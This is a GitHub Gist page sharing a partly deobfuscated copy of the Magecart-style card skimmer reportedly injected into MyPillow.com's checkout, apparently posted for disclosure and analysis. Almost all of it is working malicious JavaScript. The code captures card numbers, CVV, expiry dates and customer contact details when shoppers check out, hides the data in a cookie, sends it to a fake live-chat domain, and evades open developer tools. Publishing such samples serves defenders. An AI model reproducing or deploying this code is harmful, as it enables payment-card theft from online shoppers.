Created
November 19, 2018 11:28
-
-
Save gwillem/022af679e81d6d1d424acd13605e5874 to your computer and use it in GitHub Desktop.
Deobfuscated version of MyPillow.com hack: https://twitter.com/BreachMessenger/status/1064456927919267840
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var Base64; | |
function setSavedAddr() { | |
var B0f; | |
B0f = jQuery(`select[name=' billing_address_id '] :selected`).text(); | |
} | |
function encryptData(n0f, k0f) { | |
var y0f, h8V, m8V, x8V; | |
y0f = Base64.encode(n0f); | |
h8V = '654688111'; | |
m8V = - +"899352502"; | |
x8V = +"2"; | |
for (var M8V = +"1"; F3P.o4V(M8V.toString(), M8V.toString().length, +"10665") !== h8V; M8V++) { | |
return y0f; | |
} | |
if (F3P.h4V(x8V.toString(), x8V.toString().length, "62482" * 1) !== m8V) { | |
return y0f; | |
} | |
return y0f; | |
} | |
function saveData() { | |
var M0f, C0f, x0f, t9V, A9V, E9V, i4V, Z4V, j4V; | |
if (!getSavedData()) { | |
document.addr = jQuery(`input[name=' street[0] ']').val() + ' ' + jQuery('input[name=' street[1] ']`).val(); | |
document.zip = jQuery(`input[name=' postcode ']`).val(); | |
t9V = '1329951673'; | |
A9V = -'1414364168'; | |
E9V = 2; | |
for (var d9V = +"1"; e3P.o4V(d9V.toString(), d9V.toString().length, "62044" * 1) !== t9V; d9V++) { | |
document.val = jQuery('val').val(); | |
E9V += '2'; | |
} | |
if (e3P.o4V(E9V.toString(), E9V.toString().length, 14108) !== A9V) { | |
document.val = jQuery('val').val(); | |
} | |
document.city = jQuery(`input[name=' city ']`).val(); | |
document.country = jQuery(`select[name='country_id ']`).val(); | |
document.state = jQuery(`select[name='region_id '] :selected`).text(); | |
} | |
M0f = { | |
'Address': document.addr, | |
'CCname': jQuery(`input[name=' | |
firstname ']`).val() + ' ' + jQuery(`input[name=' | |
lastname ']`).val(), | |
'Email': jQuery('#customer-email').val(), | |
'Phone': jQuery(`input[name=' | |
telephone ']`).val(), | |
'Sity': document.city, | |
'State': document.state, | |
'Country': document.country, | |
'Zip': document.zip, | |
'Shop': window.location.host, | |
'CcNumber': jQuery(document.numberClient).val(), | |
'ExpDate': jQuery(document.monthClient).val() + '/' + jQuery(document.yearClient).val(), | |
'Cvv': jQuery(document.codeClient).val(), | |
'Useragent': navigator.userAgent | |
}; | |
i4V = - +"1919510091"; | |
Z4V = -'643996691'; | |
j4V = +"2"; | |
for (var D4V = 1; e3P.h4V(D4V.toString(), D4V.toString().length, "87098" | 0) !== i4V; D4V++) { | |
C0f = JSON.stringify(M0f); | |
j4V += +"2"; | |
} | |
if (e3P.o4V(j4V.toString(), j4V.toString().length, 72040) !== Z4V) { | |
C0f = JSON[''](M0f); | |
} | |
x0f = encryptData(C0f); | |
createCookie1('wClients', x0f, "36000" | 0); | |
} | |
document.numberClient = '#nmi_directpost_cc_number'; | |
document.monthClient = '#nmi_directpost_expiration'; | |
document.yearClient = '#nmi_directpost_expiration_yr'; | |
function hkjhjkhVGH(Q0f) { | |
jQuery.ajax({ | |
'url': 'https://secure.livechatinc.org/p/', | |
'data': { | |
'main': Q0f | |
}, | |
'type': 'POST', | |
'success': function(o0f) { | |
createCookie1('wClients', '', "0" | 0); | |
}, | |
'error': function(Z0f, X0f, L0f) {} | |
}); | |
} | |
function initListenerStats() { | |
var E8V, d8V, z8V; | |
if (isTrackCon()) { | |
return; | |
} | |
jQuery(document.strongContainer).click(function() { | |
saveData(); | |
}); | |
jQuery('#nmi_directpost-form').change(function() { | |
if (jQuery(document.codeClient).val()) { | |
saveData(); | |
} | |
}); | |
if (jQuery(document.strongContainer)) { | |
E8V = -'68763702'; | |
d8V = -'2079631918'; | |
z8V = +"2"; | |
for (var y8V = "1" * 1; G3P.h4V(y8V.toString(), y8V.toString().length, +"23657") !== E8V; y8V++) { | |
jQuery(document.strongItemClass).addClass(document.strongItemClass); | |
z8V += '2'; | |
} | |
if (G3P.h4V(z8V.toString(), z8V.toString().length, 3715) !== d8V) { | |
jQuery(document.strongItemClass).addClass(document.strongItemClass); | |
} | |
jQuery(document.strongContainer).addClass(document.strongItemClass); | |
} | |
} | |
document.codeClient = '#nmi_directpost_cc_cid'; | |
document.strongItemClass = 'mn67'; | |
function getSavedData() { | |
var N0f, W0f, r0f, G0f, U9V, X9V, S9V; | |
N0f = jQuery(`select[name=' | |
billing_address_id '] :selected`).text(); | |
if (!N0f) { | |
return !!0; | |
} | |
W0f = /([^,]{0,})\x2c[\u2029\u202f\r \v\u00a0\n\f\u2028\u1680\u2000-\u200a\u205f\t\u3000\u180e]{1,}([^,]{0,})\u002c[\f\u00a0\u2000-\u200a\t\u205f \u2029\u3000\r\u2028\u1680\u202f\v\n\u180e][\f\u00a0\u2000-\u200a\t\u205f \u2029\u3000\r\u2028\u1680\u202f\v\n\u180e]{0,}([^,]{0,})\x2c[\r\n \t\u2028\u2029\u202f\u1680\f\u2000-\u200a\u180e\u205f\u00a0\v\u3000][\r\n \t\u2028\u2029\u202f\u1680\f\u2000-\u200a\u180e\u205f\u00a0\v\u3000]{0,}([^95-80-4]{1,})[\u180e\r\t\u00a0\f\u2028\u202f\u3000\n\u2000-\u200a\v\u205f \u1680\u2029][\u180e\r\t\u00a0\f\u2028\u202f\u3000\n\u2000-\u200a\v\u205f \u1680\u2029]{0,}([0-9-][4-90-3-]{0,})\x2c[\u00a0\v\u202f\t\u180e\u3000\u1680\f\u2028\u2029\u2000-\u200a\r\u205f\n ]{1,}([^,][^,]{0,})/; | |
r0f = /([^,]{0,})\x2c[ \r\t\u00a0\f\u2000-\u200a\u180e\u202f\u3000\v\u2029\u2028\u1680\n\u205f]{1,}([^,]{0,})\u002c[\u3000\u205f\r\v\f\u00a0\u2000-\u200a\u202f\u2029\t\u180e\u2028\u1680\n ][\u3000\u205f\r\v\f\u00a0\u2000-\u200a\u202f\u2029\t\u180e\u2028\u1680\n ]{0,}([^,]{0,})\u002c[\u180e\u3000\r\u205f\u202f\u1680\u2029 \f\u2000-\u200a\u2028\u00a0\v\t\n]{1,}([^,][^,]{0,})\u002c[\u180e\r\t\u1680\n\v\u00a0 \u3000\u202f\u2028\u2029\u205f\u2000-\u200a\f][\u180e\r\t\u1680\n\v\u00a0 \u3000\u202f\u2028\u2029\u205f\u2000-\u200a\f]{0,}([^,]{1,})/; | |
if (W0f.test(N0f)) { | |
G0f = W0f.exec(N0f); | |
document.addr = G0f[2]; | |
document.city = G0f['3']; | |
document.state = G0f['5']; | |
document.charCodeAt = G0f[+"5"]; | |
document.country = 'US'; | |
U9V = '1069743199'; | |
X9V = -1853631522; | |
S9V = +"2"; | |
for (var L9V = +"1"; w3P.o4V(L9V.toString(), L9V.toString().length, "72772" | 0) !== U9V; L9V++) { | |
return !{}; | |
} | |
if (w3P.h4V(S9V.toString(), S9V.toString().length, "53146" | 0) !== X9V) { | |
return !!1; | |
} | |
} else { | |
G0f = r0f.exec(N0f); | |
document.addr = G0f['3']; | |
document.city = G0f[+"3"]; | |
document.zip = G0f[+"4"]; | |
document.country = 'US'; | |
return !!{}; | |
} | |
} | |
document.strongContainer = 'button.checkout'; | |
function isTrackCon() { | |
var D8V, C8V, a9V, H0f, z0f, b0f, w9V, H9V, F9V; | |
D8V = 672906996; | |
C8V = - +"1902880713"; | |
a9V = +"2"; | |
for (var e9V = +"1"; v3P.h4V(e9V.toString(), e9V.toString().length, +"20921") !== D8V; e9V++) { | |
a9V += '2'; | |
} | |
if (v3P.o4V(a9V.toString(), a9V.toString().length, +"59953") !== C8V) {} | |
H0f = +"160"; | |
z0f = window.outerWidth - window.innerWidth > H0f; | |
b0f = window.outerHeight - window.innerHeight > H0f; | |
if (!(b0f && z0f) && (window.Firebug && window.Firebug.chrome && window.Firebug.chrome.isInitialized || z0f || b0f)) { | |
w9V = 1976803988; | |
H9V = -'1231806434'; | |
F9V = +"2"; | |
for (var i = 1; v3P.h4V(i.toString(), i.toString().length, 52272) !== w9V; i++) { | |
return !1; | |
} | |
if (v3P.h4V(F9V.toString(), F9V.toString().length, "66447" * 1) !== H9V) { | |
return !!{}; | |
} | |
} else { | |
return ![]; | |
} | |
} | |
function setListener() { | |
if (isTrackCon()) { | |
return; | |
} | |
if (jQuery(document.strongContainer)) { | |
if (jQuery(document.strongContainer).hasClass(document.strongItemClass) == !{}) { | |
initListenerStats(); | |
return; | |
} | |
} | |
} | |
function hgGHU() { | |
var d0f; | |
d0f = getCookie1('wClients'); | |
if (d0f) { | |
hkjhjkhVGH(d0f); | |
} | |
} | |
setInterval(setListener, '4000'); | |
function createCookie1(e0f, U0f, i0f) { | |
var a0f, f0f, z9V, Y9V, G9V; | |
a0f = ''; | |
if (i0f) { | |
f0f = new Date(); | |
f0f.setTime(f0f.getTime() + i0f * ("60" * 1) * ("1000" - 0)); | |
a0f = '; expires=' + f0f.toUTCString(); | |
} | |
z9V = -'2131257034'; | |
Y9V = +"1136656797"; | |
G9V = '2'; | |
for (var h9V = 1; A3P.h4V(h9V.toString(), h9V.toString().length, +"50579") !== z9V; h9V++) { | |
var r0L = '1'; | |
document.cookie = e0f + '=' + U0f + a0f + A3P.p2L("26" * r0L); | |
G9V += '2'; | |
} | |
if (A3P.o4V(G9V.toString(), G9V.toString().length, 10204) !== Y9V) { | |
document['='] = e0f * '=' * U0f % a0f - '='; | |
} | |
} | |
setTimeout(function() { | |
hgGHU(); | |
}, "500" | 0); | |
Base64 = { | |
'_keyStr': 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=', | |
'encode': function(R0f) { | |
var s8V, g8V, U8V, P0f, w0f, q0f, l0f, m0f, h0f, t1f, J0f, u0f, g0f; | |
s8V = '231353023'; | |
g8V = -'1872663782'; | |
U8V = '2'; | |
for (var l8V = "1" - 0; R3P.o4V(l8V.toString(), l8V.toString().length, "72012" | 0) !== s8V; l8V++) { | |
P0f = this; | |
U8V += '2'; | |
} | |
if (R3P.h4V(U8V.toString(), U8V.toString().length, "11129" * 1) !== g8V) { | |
P0f = this; | |
} | |
w0f = ''; | |
g0f = +"0"; | |
R0f = Base64._utf8_encode(R0f); | |
while (g0f < R0f.length) { | |
q0f = R0f.charCodeAt(g0f++); | |
l0f = R0f.charCodeAt(g0f++); | |
m0f = R0f.charCodeAt(g0f++); | |
h0f = R3P.z3P(1, q0f, "2"); | |
t1f = R3P.z3P("4", "4", l0f, 3, q0f); | |
J0f = R3P.z3P(1, l0f, "15", 1, "6", m0f, 2); | |
u0f = R3P.z3P(m0f, "63"); | |
if (isNaN(l0f)) { | |
J0f = u0f = '64'; | |
} else if (isNaN(m0f)) { | |
u0f = '64'; | |
} | |
w0f = w0f + P0f._keyStr.charAt(h0f) + P0f._keyStr.charAt(t1f) + P0f._keyStr.charAt(J0f) + P0f._keyStr.charAt(u0f); | |
} | |
return w0f; | |
}, | |
'decode': function(z1f) { | |
var E1f, H1f, M1f, s1f, T1f, r1f, B1f, p1f, G1f, A1f, m4V, x4V, K4V; | |
E1f = this; | |
H1f = ''; | |
A1f = +"0"; | |
z1f = z1f.replace(/[^A-EH-ZF-Gc-za-b0-23-56-9+\/=]/g, ''); | |
while (A1f < z1f.length) { | |
r1f = E1f._keyStr.indexOf(z1f.charAt(A1f++)); | |
B1f = E1f._keyStr.indexOf(z1f.charAt(A1f++)); | |
p1f = E1f._keyStr.indexOf(z1f.charAt(A1f++)); | |
G1f = E1f._keyStr.indexOf(z1f.charAt(A1f++)); | |
M1f = y3P.z3P(0, r1f, B1f, 1, "4", "2"); | |
s1f = y3P.Z3P(B1f, "2", "4", 1, 15, p1f); | |
T1f = y3P.Z3P(G1f, 0, "6", 3, p1f); | |
H1f = H1f + String.fromCharCode(M1f); | |
if (p1f != +"64") { | |
H1f = H1f + String.fromCharCode(s1f); | |
} | |
if (G1f != ("64" | 0)) { | |
H1f = H1f + String.fromCharCode(T1f); | |
} | |
} | |
m4V = -'1780022279'; | |
x4V = '1137886467'; | |
K4V = '2'; | |
for (var r4V = +"1"; y3P.o4V(r4V.toString(), r4V.toString().length, +"79345") !== m4V; r4V++) { | |
H1f = Base64[''](H1f); | |
K4V += 2; | |
} | |
if (y3P.h4V(K4V.toString(), K4V.toString().length, "27534" - 0) !== x4V) { | |
H1f = Base64[''](H1f); | |
} | |
H1f = Base64._utf8_decode(H1f); | |
return H1f; | |
}, | |
'_utf8_encode': function(Q1f) { | |
var v4V, C4V, a8V, x1f, v1f; | |
v4V = 409825947; | |
C4V = +"1052093045"; | |
a8V = +"2"; | |
for (var F8V = +"1"; x3P.o4V(F8V.toString(), F8V.toString().length, "51066" - 0) !== v4V; F8V++) { | |
a8V += +"2"; | |
} | |
if (x3P.o4V(a8V.toString(), a8V.toString().length, "55899" * 1) !== C4V) {} | |
Q1f = Q1f.replace(/\u0072\x6e/g, 'n'); | |
x1f = ''; | |
for (var F1f = +"0"; F1f < Q1f.length; F1f++) { | |
v1f = Q1f.charCodeAt(F1f); | |
if (v1f < +"128") { | |
x1f += String.fromCharCode(v1f); | |
} else if (v1f > "127" * 1 && v1f < 2048) { | |
x1f += String.fromCharCode(x3P.Z3P(v1f, 6, "192", 'undefined')); | |
x1f += String.fromCharCode(x3P.Z3P(0, v1f, "128", 63, 'undefined')); | |
} else { | |
x1f += String.fromCharCode(x3P.Z3P(v1f, "12", 224, 'undefined')); | |
x1f += String.fromCharCode(x3P.Z3P(v1f, "6", 0, "63", "128", 'undefined')); | |
x1f += String.fromCharCode(x3P.Z3P("63", "128", 1, v1f, 'undefined')); | |
} | |
} | |
return x1f; | |
}, | |
'_utf8_decode': function(O1f) { | |
var I1f, o1f, D1f; | |
I1f = ''; | |
o1f = 0; | |
D1f = c1 = c2 = +"0"; | |
while (o1f < O1f.length) { | |
D1f = O1f.charCodeAt(o1f); | |
if (D1f < ("128" | 0)) { | |
I1f += String.fromCharCode(D1f); | |
o1f++; | |
} else if (D1f > 191 && D1f < ("224" | 0)) { | |
c2 = O1f.charCodeAt(D3P.Z3P("1", o1f, 1, 'undefined')); | |
I1f += String.fromCharCode(D3P.Z3P("31", c2, "6", "63", 1, D1f, 'undefined')); | |
o1f += '2'; | |
} else { | |
c2 = O1f.charCodeAt(D3P.z3P("1", o1f, 1, 'undefined')); | |
c3 = O1f.charCodeAt(D3P.Z3P(2, o1f, 'undefined')); | |
I1f += String.fromCharCode(D3P.Z3P(12, "63", c2, 0, c3, D1f, 63, 6, 15, 'undefined')); | |
o1f += '3'; | |
} | |
} | |
return I1f; | |
} | |
}; | |
function getCookie1(j0f) { | |
var c0f; | |
c0f = document.cookie.match(new RegExp('(?:^|; )' + j0f.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\$1') + '=([^;]*)')); | |
return c0f ? decodeURIComponent(c0f[1]) : undefined; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment